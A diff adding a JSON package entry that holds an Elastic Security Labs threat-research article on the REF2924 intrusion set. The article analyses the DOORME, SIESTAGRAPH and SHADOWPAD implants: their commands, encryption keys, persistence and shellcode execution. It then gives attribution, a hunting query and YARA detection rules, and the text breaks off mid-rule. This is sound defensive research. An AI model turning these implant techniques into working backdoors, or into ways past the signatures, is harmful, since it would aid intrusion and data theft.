+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-update_to_the_ref2924_intrusion_set_and_related_campaigns-md.json
@@ -0,0 +1,49 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Update to the REF2924 intrusion set and related campaigns\"\nslug: \"update-to-the-REF2924-intrusion-set-and-related-campaigns\"\ndate: \"2023-02-07\"\nsubtitle: \"Elastic Security Labs is providing an update to the active intrusions using SIESTAGRAPH, DOORME, and SHADOWPAD, including malware analysis and associations with additional campaigns.\"\ndescription: \"Elastic Security Labs is providing an update to the REF2924 research published in December of 2022. This update includes malware analysis of the implants, additional findings, and associations with other intrusions.\"\nauthor:\n - slug: salim-bitam\n - slug: remco-sprooten\n - slug: cyril-francois\n - slug: andrew-pease\n - slug: devon-kerr\n - slug: seth-goodwin\nimage: \"photo-edited-02@2x.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - ref2924\n - siestagraph\n - doorme\n - shadowpad\n - winnti\n - chamelgroup\n - apt41\n---\n\n## Key takeaways\n\n- DOORME is a malicious IIS module that provides remote access to a contested network.\n- SIESTAGRAPH interacts with Microsoft’s GraphAPI for command and control using Outlook and OneDrive.\n- SHADOWPAD is a backdoor that has been used in multiple campaigns attributed to a regional threat group with non-monetary motivations.\n- REF2924 analytic update incorporating third-party and previously undisclosed incidents linking the REF2924 adversary to Winnti Group and ChamelGang along technical, tactical, and victim targeting lines.\n\n## Preamble\n\nThis research highlights the capabilities and observations of the two backdoors, named \"DOORME\" and \"SIESTAGRAPH\", and a backdoor called “SHADOWPAD” that was [disclosed by Elastic](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) in December of 2022. DOORME is an IIS (Internet Information Services) backdoor module, which is deployed to web servers running the IIS software. SIESTAGRAPH is a .NET backdoor that leverages the Microsoft Graph interface, a collection of APIs for accessing various Microsoft services. SHADOWPAD is an actively developed and maintained modular remote access toolkit.\n\nDOORME, SIESTAGRAPH, and SHADOWPAD each implement different functions that can be used to gain and maintain unauthorized access to an environment. The exact details of these functionalities will be described in further detail in this research publication. It is important to note that these backdoors can be used to steal sensitive information, disrupt operations, and gain a persistent presence in a victim environment.\n\nAdditionally, we will discuss the relationships between REF2924 and three other intrusions carried out by the same threat group, intrusion set, or both. These associations are made using first-party observations and third-party reporting. They have allowed us to state with moderate confidence that SIESTAGRAPH, DOORME, SHADOWPAD, and other elements of REF2924 are attributed to a regional threat group with non-monetary motivations.\n\n> Additional information on the REF2924 intrusion setFor additional information on this intrusion set, which includes our initial disclosure as well as information into the campaign targeting the Foreign Ministry of an ASEAN member state, check out our [previous research into REF2924](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry).\n\n## DOORME code analysis\n\n### Introduction to backdoored IIS modules\n\n[IIS](https://www.iis.net/), developed by Microsoft, is an extensible web server software suite that serves as a platform for hosting websites and server-side applications within the Windows environment. With version 7.0, Microsoft has equipped IIS with a modular architecture that allows for the dynamic inclusion or exclusion of modules to suit various functional requirements. These modules correspond to specific features that the server can utilize to handle incoming requests.\n\nAs an example, a backdoored module that overrides the [**OnGlobalPreBeginRequest**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-onglobalprebeginrequest-method)event can be used to perform various malicious activities - such as capturing sensitive user information submitted to webpages, injecting malicious code into content served to visitors, or providing the attacker remote access to the web server. It is possible that a malicious module could intercept and modify a request before it is passed on to the server, adding an HTTP header or query string parameter that includes malicious code. When the server processes that modified request, the malicious code might be executed, allowing the attacker to gain unauthorized access or control the server and its resources.\n\nAdding to the danger of IIS backdoors is that they can be stealthy and organizations may not be aware that they have been compromised. Many companies do not have the resources or expertise to regularly monitor and test their IIS modules for vulnerabilities and malicious code, which can make it difficult to detect and remediate backdoors. To mitigate these risks, organizations should maintain a comprehensive inventory of all IIS modules and implement network and endpoint protection solutions to help detect and respond to malicious activities. Elastic Security Labs has seen increased use of this persistence mechanism coupled with defense evasions, which may disproportionately impact those hosting on-premises servers running IIS.\n\n### Introduction to the DOORME IIS module\n\nDOORME is a native backdoor module that is loaded into a victim's IIS infrastructure and used to provide remote access to the target infrastructure. We [first discussed](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) the DOORME sample that we observed targeting the Foreign Ministry of an ASEAN member nation in December of 2022.\n\nDOORME uses the [**RegisterModule**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/pfn-registermodule-function) function, which is an export of a malicious C++ DLL module and is responsible for loading the module and setting up event handler methods. It also dynamically resolves API libraries that will be used later. The main functionality of the backdoor is implemented in the [**CGlobalModule**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-class)class and its event handler, [**OnGlobalPreBeginRequest**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-onglobalprebeginrequest-method). This event handler is overridden by DOORME, allowing it to be loaded before a web request enters the IIS pipeline. The core functions of the backdoor (including cookie validation, parsing commands, and calling underlying command functions) are all located within this event handler. DOORME uses multiple obfuscation methods, an authentication mechanism, AES encryption implementation, and a purpose-built series of commands.\n\nThis diagram illustrates the contrast between an attacker attempting to connect to a backdoored IIS server and a legitimate user simply trying to access a webpage.\n\n\n\n### Obfuscation\n\n#### String obfuscation\n\nDOORME XOR-encrypts strings to evade detection. These encrypted strings are then stored on the memory stack. As the original plaintext is obscured this string obfuscation makes it more difficult for security software or researchers to understand the purpose or meaning of the strings. The malware uses the first byte of every encrypted blob to XOR-decrypt the strings.\n\n\n\n#### Anti-disassembly technique\n\nThe malware employs a technique that can cause disassemblers to incorrectly split functions in the code, which leads to the generation of incorrect assembly graphs. This technique can make it more challenging for analysts to understand the malware's behavior and create an effective defense against it.\n\n\n\n#### Control flow obfuscation\n\nThe malware in question also employs a technique known as [Control Flow Obfuscation (CFO)](https://unprotect.it/technique/obscuring-control-flow/) to complicate the analysis of its behavior. CFO is a technique where the flow of instructions in the code is deliberately manipulated to make it more difficult for security software and researchers to understand the malware's functionality.\n\nThe malware uses CFO to complicate the analysis process, but it is noteworthy that this technique is not applied to the entire codebase. From an analysis point of view, this tells us that these strings are of particular importance to the malware author - possibly to frustrate specific security tooling. The following example serves as a demonstration of how the malware uses CFO to conceal its functionality in the context of stack string XOR decryption.\n\n\n\n#### Dynamic import table resolution obfuscation\n\nDynamic import table resolution is a technique used by malicious software to evade detection by security software. It involves resolving the names of the Windows APIs that the malware needs to function at runtime, rather than hard coding the addresses of these APIs in the malware's import table.\n\nDOORME first resolves the address of **LoadLibraryA** and **GetProcAddress** Windows API by parsing the **kernel32.dll** module export table, then uses the **GetProcAddress** function to locate the desired APIs within the modules by specifying the name of the API and the name of the DLL module that contains it.\n\n\n\n### Execution flow\n\n#### Authentication\n\nThe malicious IIS module backdoor operates by looking for the string \" **79cfdd0e92b120faadd7eb253eb800d0**\" (the MD5 hash sum of a profane string), in a specific cookie of the incoming HTTP requests, when found it will parse the rest of the request.\n\n#### GET request handling\n\n**GET** requests are used to perform a status check: the malware returns the string “ **It works!”** followed by the **username** and the **hostname** of the infected machine. This serves as a means for the malware to confirm its presence on an infected machine.\n\n\n\n#### POST requests handling\n\nThe backdoor operator sends commands to the malware through HTTP POST requests as data which is doubly encrypted. Commands are AES-encrypted and then Base64 encoded, which the DOORME backdoor then decrypts.\n\n#### Base64 implementation\n\nThe malware's implementation of Base64 uses a different index table compared to the default Base64 encoding RFC. The specific index table used by the malware is **\"VZkW6UKaPY8JR0bnMmzI4ugtCxsX2ejiE5q/9OH3vhfw1D+lQopdABTLrcNFGSy7\"** , while the normal index table used by the Base64 algorithm is **\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"**. This deviation from the standard index table makes it more difficult to decode the encoded data and highlights additional custom obfuscation techniques by the DOORME malware author in an attempt to frustrate analysis.\n\n#### AES algorithm implementation\n\nThe malware uses [AES (Advanced Encryption Standard)](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) in CBC (Cipher Block Chaining) mode to encrypt and decrypt data. It uses the MD5 hash of the first 16 bytes of the authentication hash \" **79cfdd0e92b120faadd7eb253eb800d0**\", as the AES key. The initialization vector (IV) of the algorithm is the MD5 hash of the AES key.\n\nIn our case the AES key is “ **5a430ab45c7e142c70018b99fe0d2da3”** and the AES IV is “ **57ce15b304a97772”**.\n\n### Command handling table\n\nThe backdoor is capable of executing four different commands, each with its own set of parameters. To specify which command to run and pass the necessary parameters, the operators of the backdoor use a specific syntax. The command ID and its parameters are separated by the \"pipe\" symbol( **|** ).\n\n#### Command ID 0x42\n\nThe first command implemented has the ID **0x42** and generates a Globally Unique Identifier (GUID) by calling the API **CoCreateGuid**. Used to identify the infected machine, this helps to track infected machines and allows the attacker to focus on specific high-value environments.\n\n\n\n#### Command ID 0x43\n\nAnother command, ID **0x43** , is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process. This functionality is achieved by utilizing the Windows native functions **NtAllocateVirtualMemory** and **NtCreateThreadEx**.\n\nThe **NtAllocateVirtualMemory** function is used to allocate memory in the same process for shellcode, while the **NtCreateThreadEx** function creates an execution thread with shellcode in that newly-allocated memory.\n\n\n\n#### Command ID 0x63\n\nCommand ID **0x63** allows the attacker to send a blob of shellcode in chunks, which the malware reassembles to execute. It works by sending this command ID with a shellcode chunk as a parameter. Implants can detect that the shellcode has been fully received when the server communicates a different shellcode size than expected. This approach allows the malware to handle large shellcode objects with minimal validation.\n\n#### Command ID 0x44\n\nCommand ID **0x44** provides a means of interacting with the shellcode being executed on the infected system. The attacker can send input to the shellcode and retrieve its output via a named pipe. This allows the attacker to control the execution of the shellcode and receive feedback, which may help to capture the output of tools deployed in the environment via the DOORME implant.\n\n### DOORME Summary\n\nIn summary, DOORME provides a dangerous capability allowing attackers to gain unauthorized access to the internal network of victims through an internet-facing IIS web server. It includes multiple obfuscation techniques to evade detection, as well as the ability to execute additional malware and tools. Malware authors are increasingly leveraging IIS as covert backdoors that hide deep within the system. To protect against these threats, it is important to continuously monitor IIS servers for any suspicious activity, processes spawned from the IIS worker process ( **w3wp.exe** ), and the creation of new executables.\n\n## SIESTAGRAPH code analysis\n\n### Introduction to the SIESTAGRAPH implant\n\nThe implant utilizes the [Microsoft Graph API](https://learn.microsoft.com/en-us/graph/overview) to access Microsoft 365 Mail and OneDrive for its C2 communication. It uses a predetermined tenant identifier and a refresh token to obtain access tokens. The implant uses the legitimate [OneDriveAPI library](https://github.com/KoenZomers/OneDriveAPI) which simplifies the process of interacting with the Microsoft API and allows for efficient management of access and refresh tokens. The implant leverages sleep timers in multiple locations as a defense evasion technique. This led to the implant’s name: SIESTAGRAPH.\n\n\n\n### Execution flow\n\nSIESTAGRAPH starts and enters its main function which will set up the needed parameters to access Microsoft GraphAPI by requesting an access token based on a hard coded refresh token.\n\n ( **d3590ed6-52b3-4102-aeff-aad2292ab01c** ). This is needed to supply access to both Microsoft 365 Mail and OneDrive.\n\n\n\n### Authentication\n\nThe SIESTAGRAPH author utilized a pre-determined tenant identifier and a refresh token to obtain access tokens. Both of these elements are essential in making a request for an access token. It is important to note that access tokens possess a limited lifespan, however, the refresh token can be utilized to request new access tokens as necessary.\n\n\n\nTo facilitate this process, the attacker utilized a third-party and legitimate library named [OneDriveAPI](https://github.com/KoenZomers/OneDriveAPI). This library simplifies the process of interacting with the Microsoft API and allows for efficient management of access and refresh tokens. It should be noted that although third-party libraries such as OneDriveAPI can provide a convenient way to interact with APIs, they should not be considered to be malicious.\n\n\n\nThe malware utilizes the **GetAccessTokenFromRefreshToken** method to request an authentication token. This token is then used in all subsequent API requests.\n\nRefresh tokens have a [90-day expiration window](https://learn.microsoft.com/en-us/microsoft-365/enterprise/session-timeouts?view=o365-worldwide#:~:text=The%20default%20lifetime%20for%20the%20access%20token%20is%201%20hour.%20The%20default%20max%20inactive%20time%20of%20the%20refresh%20token%20is%2090%20days). So while the access token was being used by the Graph API for C2, the refresh token, which is needed to generate new access tokens, was not used within the expiration window. The refresh token was generated on 2022-11-01T03:03:44.3138133Z and expired on 2023-01-30T03:03:44.3138133Z. This means that a new refresh token will be needed before a new access token can be generated. As the refresh token is hard coded into the malware, we can expect SIESTAGRAPH to be updated with a new refresh token if it is intended to be used in the future.\n\n### Command and control\n\nA session token ( **sessionToken** ) is created by concatenating the process ID, machine name, username, and operating system. The session token is later used to retrieve commands intended for this specific implant.\n\n\n\nAfter obtaining authentication and session tokens, the malware collects system information and exfiltrates it using a method called **sendSession**.\n\nInspecting the **sendSession** method we see that it creates an email message and saves it as a draft. Using draft messages is common C2 tradecraft as a way to avoid email interception and inspection.\n\n\n\nAfter sending the session information to the attacker, the implant enters a loop in which it will check for new commands. By default, this beaconing interval is every 5 seconds, however, this can be adjusted by the attacker at any time.\n\nWhen receiving a command, the implant will use the **getMessages** method to check for any draft emails with commands from the attacker.\n\n\n\nWith every call that contacts the Graph API, SIESTAGRAPH will receive the current authentication token ( **authToken** ). This token is then used in the HTTP request header following the **Authorization: Bearer** ( **“Authorization”, “Bearer “ + authToken** ).\n\nEvery call to this method will contain the **sessionToken** , a command, and command arguments, separated with colons ( **:** ) ( **`::`** ).\n\nIf a command has multiple arguments they will be split by a pipe ( **|** ). An example of this is the **rename** command where the source and destination names are split by a pipe.\n\n\n\nWe have identified the following commands:\n\n| Command text | Description |\n| -------------- | ----------------------------------------------------------------------------- |\n| C | Run a command |\n| N | Update the amount of time the binary will sleep between check-ins |\n| D | Upload a file to OneDrive |\n| U | Download Item from Onedrive |\n| UU | Check to see is Core.bin exists then Download item from Onedrive |\n| ListDrives | Send a list of the logical drives |\n| GetDirectories | Send a list of given subdirectories |\n| GetFiles | Send a list of files in a given directory |\n| Del | Delete a given file |\n| Rename | Rename a given file or directory |\n| P | Get a list of running processes |\n| E | Ends the execution of the binary |\n| K | Kill a given process ID |\n| S | Update the amount of time the binary will sleep between check-ins (same as N) |\n| NET | Get network information |\n| SS | Take a screenshot |\n\nSeveral commands are self-explanatory ( **ListDrives** , **Rename** , etc.), however the run commands, update sleep timer, upload and download files, and take screenshots are more interesting and can provide a better understanding of the capabilities of SIESTAGRAPH.\n\n#### C - run command\n\nWhen the **C** command is received the malware runs the **runCommand** method. This method takes in the name of **cmd.exe** , the command line to run, and the number of milliseconds to wait for the new process to exit.\n\nIf the command parameter is not null or empty, the method proceeds to create a new instance of the **System.Diagnostics.Process** class, which is used to start and interact with a new process. It sets the properties of the process instance's **StartInfo** property, which is of the **ProcessStartInfo** class, such as the **FileName** property to the **cmd** parameter passed to the method, the **Arguments** property to **/c** concatenated with the command parameter, and also sets **UseShellExecute** , **RedirectStandardInput** , **RedirectStandardOutput** , **RedirectStandardError,** and **CreateNoWindow** property. As this method is only called with the hard coded value of **cmd** for the **cmd** parameter, the resulting command will always be **`cmd /c `**. This is a common way to run commands if one does not have direct access to an interactive shell.\n\n\n\n#### D - Upload to OneDrive\n\nThe **D** command is issued from the attacker’s perspective, so while they’re “downloading” from OneDrive, the host is “uploading” to OneDrive\n\nThe method receives a **filePath** , and the authentication and session tokens. It will then upload the requested file to OneDrive. If the file is successfully uploaded, a response message is sent to the attacker using the format **OK|C:\\foo\\file.txt**.\n\nIf the upload did not succeed the attacker will receive the error message **`OK|`**.\n\nWhile this method might seem simple it helps to avoid detection by using common libraries while achieving the goal of exfiltrating data from the victim. While unconfirmed, this could be how the [exported Exchange mailboxes](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry#exporting-exchange-mailboxes) were collected by the threat actor.\n\n\n\n#### U - Download from OneDrive\n\nThe download function is similar to the upload function. Again, from the attacker's perspective, the **U** command stands for upload. As the file is downloaded from OneDrive by the implant, but uploaded by the attacker.\n\n#### NET - Gather network information\n\nThe **NET** command will gather network information and send it back to the attacker. In order to gather the information the binary first resolves two functions from the DLLs, **Ws2_32.dll** (the Windows socket API) and **iphlpapi.dll** (the Windows IP helper API).\n\n\n\nThe **NET** command gathers information about open TCP connections from the system's TCP table. It then loops over all open connections and stores the information in an array that is sent back to the attacker. This code helps the attacker to get a better insight into the system's purpose within the network. As an example, if there are open connections for ports 587, 993, and 995, the host could be a Microsoft Exchange server.\n\n#### SS - Take screenshot\n\nTo see the victim's desktop, SIESTAGRAPH can call the method named **TakeScreenShot** which takes a screenshot of the primary monitor and returns the screenshot as a Base64 encoded string.\n\n\n\nThis function creates a new **Bitmap** object with the width and height of the primary screen's bounds. Then it creates a new **Graphics** object from the **Bitmap** object and uses the **CopyFromScreen** function to take a screenshot and copy it to the **Graphics** object.\n\nIt then creates a new **MemoryStream** object and uses the **Save** method of the **Bitmap** object to save the screenshot as a PNG image into the memory stream. The image in the memory stream is then converted to a Base64 encoded string using the **Convert.ToBase64String** method. The resulting Base64 string is then sent back to the attacker by saving it as an email draft.\n\n### SIESTAGRAPH Summary\n\nSIESTAGRAPH is a purpose-built and full-featured implant that acts as a proxy for the threat actor. What makes SIESTAGRAPH more than a generic implant is that it uses legitimate and common, but adversary-controlled, infrastructure to deliver remote capabilities on the infected host.\n\n## SHADOWPAD loader code analysis\n\n### Introduction to log.dll\n\nWhen Elastic Security Labs [disclosed](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry#dll-side-loading) REF2924 in December of 2022, we observed an unknown DLL. We have since collected and analyzed the DLL, concluding it is a loader for the [SHADOWPAD](https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad) malware family.\n\nThe DLL, **log.dll** , was observed on two Domain Controllers and was being side-loaded by an 11-year-old version of the Bitdefender Crash Handler (compiled name: **BDReinit.exe** ), named **13802 AR.exe** (in our example). Once executed, SHADOWPAD copies itself to **C:\\ProgramData\\OfficeDriver\\*\\* as **svchost.exe** before installing itself as a service. Once **log.dll** is loaded, it will spawn Microsoft Windows Media Player ( **wmplayer.exe** ) and **dllhost.exe,\\*\\* injecting into them which triggers a memory shellcode detection for Elastic Defend.\n\nAt runtime, **log.dll** looks for the **log.dll.dat** file which contains the shellcode to be executed. Then **log.dll** will encrypt and store the **shellcode** in the registry and shred the original **log.dll.dat** file. If the file doesn’t exist it will skip this part.\n\nThen the sample will load the shellcode from the registry, RWX map it, and execute it from memory. If the registry key doesn’t exist the sample will crash.\n\n### Execution flow\n\nOur version of the SHADOWPAD DLL expects to be sideloaded by an 11-year-old and vulnerable version of the BitDefender **BDReinit.exe** binary. The offset to the trampoline ([jump instructions](https://gcc.gnu.org/onlinedocs/gcc-4.7.1/gccint/Trampolines.html)) in the vulnerable application is hard coded which means that the sample is tailored for this exact version of BitDefender’s binary ( **386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd** ). This side-loading behavior was previously [reported](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/) by Positive Technologies.\n\n\n\nFor our analysis, we patched **log.dll** to execute without the BitDefender sideloading requirement.\n\n### Capabilities\n\n#### Obfuscation\n\nThe **log.dll** uses two lure functions to bypass automatic analysis.\n\nWe define lure functions as benign and not related to malware capabilities, but intended to evade defenses, obfuscate the true capabilities of the malware, and frustrate analysis. They may trick time-constrained sandbox analysis by showcasing benign behavior while exhausting the analysis interval of the sandbox.\n\n\n\n**log.dll** incorporates a code-scattering obfuscation technique to frustrate static analysis, however, this doesn't protect the binary from dynamic analysis.\n\nThis technique involves fragmenting the code into gadgets and distributing those gadgets throughout the binary. Each gadget is implemented as a single instruction followed by a call to a “resolver” function.\n\n\n\n\n\nThe resolver function of each call resolves the address of the next gadget and passes execution.\n\n\n\nThe obfuscation pattern is simple and a trace can be used to recover the original instructions:\n\n```\n**result = []\nfor i, x in enumerate(trace):\n if \"ret\" in x:\n result.append(trace[i + 1])**\n```\n\n#### API loading\n\nThe sample uses the common [Ldr crawling technique](https://0xevilc0de.com/2018/02/25/locating-dll-name-from-the-process-environment-block-peb/) to find the address of **kernel32.dll.**\n\n\n\n\n\nNext, **log.dll** parses the exports of **kernel32.dll** to get the address of the **LoadLibraryA** and **GetProcAddress** functions. It uses **GetProcAddress** to resolve imports as needed.\n\n#### Persistence\n\nThe sample expects to find a file called **log.dll.dat** in its root directory using the **FindFirstFile** and **FindNextFile** APIs. Once **log.dll.dat** is located, it is loaded, encrypted, and stored in the registry under the **`HKEY\\_LOCAL\\_MACHINE\\SOFTWARE\\Classes\\WOW6432Node\\CLSID\\\\{1845df8d-241a-a0e4-02ea341a79878897\\}\\D752E7A8\\}`** registry value.\n\nThis registry value seems to be hard coded. If the file isn't found and the hard coded registry key doesn’t exist, the application crashes.\n\n\n\nOnce the contents of **log.dll.dat** have been encrypted and embedded in the registry, the original file will be deleted. On subsequent runs, the shellcode will be loaded directly from the registry key.\n\n#### Shellcode\n\nTo execute the shellcode the sample will allocate an [RWX-protected memory region](https://www.ired.team/offensive-security/defense-evasion/finding-all-rwx-protected-memory-regions) using the **VirtualAlloc** Windows API, then write the shellcode to the memory region and pass execution to it with an ESI instruction call.\n\n\n\n\n\n\n\n### Other SHADOWPAD research\n\nWhile researching shared code and techniques, Elastic Security Labs identified a [publication from SecureWorks’ CTU](https://www.secureworks.com/research/shadowpad-malware-analysis) that describes the BitDefender sideload vulnerability. Additionally, SecureWorks has shared information describing the functionality of a file, **log.dll.dat** , which is consistent with our observations. The team at [Positive Technologies ETC](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/) also [published detailed research](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/) on SHADOWPAD which aligns with our research.\n\n### SHADOWPAD Summary\n\nSHADOWPAD is a malware family that SecureWorks CTU has associated with the [BRONZE UNIVERSITY](https://www.secureworks.com/research/threat-profiles/bronze-university) threat group and Positive Technologies ETC has associated with the [Winnti group](https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf).\n\n## Campaign and adversary modeling\n\nOur analysis of Elastic telemetry, combined with open sources and compared with third-party reporting, concludes a single nationally-aligned threat group is likely responsible. We identified relationships involving shared malware, techniques, victimology, and observed adversary priorities. Our confidence assessments vary depending on the sourcing and collection fidelity.\n\nWe identified significant overlaps in the work of Positive Technologies ETC and [SecureWorks CTU](https://www.secureworks.com/research/shadowpad-malware-analysis) while researching the DOORME, SIESTAGRAPH, and SHADOWPAD implants, and believe these are related activity clusters.\n\n\n\nIn the following analysis, we’ll discuss the four campaigns that we associate with this intrusion set including sourcing, intersections, and how each supported our attribution across all campaigns.\n\n1. Winnti - reported by Positive Technologies, January 2021\n2. Undisclosed REF, Winnti - observed by Elastic Security Labs, March 2022\n3. REF2924, ChamelGang, Winnti - reported by Elastic Security Labs, December 2022\n4. Undisclosed REF, ChamelGang - observed by Elastic Security Labs, December 2022\n\n### Winnti\n\nIn January of 2021, the team at Positive Technologies ETC [published research](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/) that overlapped with our observations for REF2924; specifically SHADOWPAD malware deployed with the file names **log.dll** and **log.dll.dat** and using the same sample of BitDefender we observed as a DLL injection vehicle.\n\nWhile the research from Positive Technologies ETC covered a different activity cluster, the adversary deployed a similar variant of SHADOWPAD, used a similar file naming methodology, and leveraged similar procedure-level capabilities; these consistencies contribute to our conclusion that REF2924 is related. In the graphic above, we use a dashed line to represent third-party consensus and moderate confidence because, while the reporting appears thorough and sound, we cannot independently validate all findings.\n\n### Undisclosed REF, Winnti\n\nIn early 2022, Elastic observed a short-lived intrusion into a telecommunications provider in Afghanistan. Using code analysis and event sampling, we internally attributed these sightings to WINNTI malware implants and external research overlaps with the [Winnti Group](https://attack.mitre.org/groups/G0044/). We continue to track this intrusion set, independently of and in relation to REF2924 observations.\n\n### REF2924, ChamelGang, Winnti\n\nIn early December 2022, we [observed](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) Powershell commands used to collect and export mailboxes from an internet-connected Microsoft Exchange server for the Foreign Affairs Office of an Association of Southeast Asian Nations (ASEAN) member. Our research identified the presence of the DOORME backdoor, SHADOWPAD, and a new malware implant we call SIESTAGRAPH (discussed in the SIESTAGRAPH code analysis section above).\n\nIn researching the events of REF2924, we believe they are consistent with details noted by [Positive Technologies' research into ChamelGang](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/), and likely represent the actions of one group with shared goals.\n\n### Undisclosed REF, ChamelGang\n\nUsing the DOORME IIS backdoor that we collected during research into REF2924, we developed a scanner that identified the presence of DOORME on an internet-connected Exchange server at a second telecommunications provider in Afghanistan.\n\n### Campaign associations\n\nBuilding associations between events, especially when relying on third-party reporting, is a delicate balance between surfacing value from specific observations and suppressing noise from circular reporting. Details reported by research teams and consisting of atomic indicators, techniques, procedures, and capabilities provide tremendous value in spotting associations between activity clusters. Elements of evidence that are repeated multiple times via circular reporting can lead to over-weighting that evidence. In analyzing these activity clusters, we have specific observations from our telemetry (host artifacts, capabilities, functionality, and adversary techniques) and third-party reporting consistent with our findings.\n\nWe use third-party reporting as supporting, but not factual, evidence to add context to our specific observations. It may be possible to verify a third-party had firsthand visibility of a threat, but that’s a rare luxury. We used estimative language in building associations where appropriate.\n\nTo uncover potential associations among these campaigns, we weighed host artifacts, tools, and TTPs more heavily than transitory atomic indicators like hashes, IP addresses, and domains.\n\nWe’ll discuss notable (non-exhaustive) overlaps in the following section.\n\n#### Campaigns 1 and 3\n\nCampaigns 1 ([Winnti](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/)) and 3 ([REF2924, ChamelGang, Winnti](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry)) are related by several elements: the use of the SHADOWPAD malware family, the specific file names ( **log.dll** and **log.dll.dat** ), and the injection technique using the same BitDefender hash.\n\n#### Campaigns 3 and 4\n\nCampaigns 3 (REF2924, ChamelGang, Winnti) and 4 (Undisclosed REF, ChamelGang) are related by the presence of a specifically configured DOORME backdoor and a shared national strategic interest for the adversary.\n\nUsing network scan results for about 180k publicly-accessible Exchange servers, and specific authentication elements uncovered while reverse engineering REF2924’s DOORME sample, we were able to identify an identical DOORME configuration at a second telecommunications provider in Afghanistan. This was a different victim than Campaign 2 (Undisclosed REF, Winnti).\n\nWhile the DOORME IIS backdoor is not widely prevalent, simply having DOORME in your environment isn’t a strong enough data point to build an association. The presence of this DOORME configuration, when compared to a search of 180k other Exchange servers and the moderate confidence of the national strategic interests, led us to associate Campaigns 3 and 4 together with high confidence and that Campaign 4 was also a part of the same threat group.\n\n## Summary\n\nDOORME allows for a threat actor to access a targeted network through the use of a backdoored IIS module on an internet-connected server. DOORME includes the capability to collect information about the infected host, upload shellcode chunks to evade detection, and execute shellcode in memory.\n\nSIESTAGRAPH is an implant discovered by Elastic Security Labs that uses the Microsoft Graph API for command and control. The Graph API is used for interacting with Microsoft Office 365, so C2 communication would be largely masked by legitimate network traffic. Elastic Security Labs has reported the tenant ID hard coded into SIESTAGRAPH to Microsoft.\n\nBased on our code analysis and the limited internet presence of DOORME and SIESTAGRAPH, we believe that this intrusion set is used by a limited distribution, or singular, threat actor.\n\nSHADOWPAD is a modular malware family that is used as a way to load and execute shellcode onto a victim system. While it has been tracked since 2017, SHADOWPAD continues to be a capable and popular remote access and persistence tool.\n\nThe REF2924 intrusion set, using SIESTAGRAPH, DOORME, SHADOWPAD, and the system binary proxy execution technique (among others) represents an attack group that appears focused on priorities that, when observed across campaigns, align with a sponsored national strategic interest.\n\n## Detections\n\n### Hunting queries\n\nHunting queries are used as a starting point for potentially malicious events, but because every environment is different, an investigation should be completed.\n\nThe following KQL query can be used to hunt for additional behaviors related to SIESTAGRAPH. This query looks for processes that are making DNS queries to graph.microsoft.com where the process does not have a trusted code-signing certificate or the process is not signed by Microsoft.\n\n```\ndns.question.name : \"graph.microsoft.com\" and (process.code_signature.trusted : “false” or not (process.code_signature.subject_name : \"Microsoft Windows\" or process.code_signature.subject_name : \"Microsoft Windows Publisher\" or process.code_signature.subject_name : \"Microsoft Corporation\")) and process.name : *\n```\n\n### Signatures\n\n- [Windows.Trojan.DoorMe](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_DoorMe.yar)\n- [Windows.Trojan.SiestaGraph](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SiestaGraph.yar)\n- [Windows.Trojan.ShadowPad](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_ShadowPad.yar)\n\n### YARA rules\n\n#### The DOORME IIS module\n\n```\nrule Windows_Trojan_DoorMe {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-12-09\"\n last_modified = \"2022-12-15\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"DoorMe\"\n threat_name = \"Windows.Trojan.DoorMe\"\n license = \"Elastic License v2\"\n strings:\n $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? }\n $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? 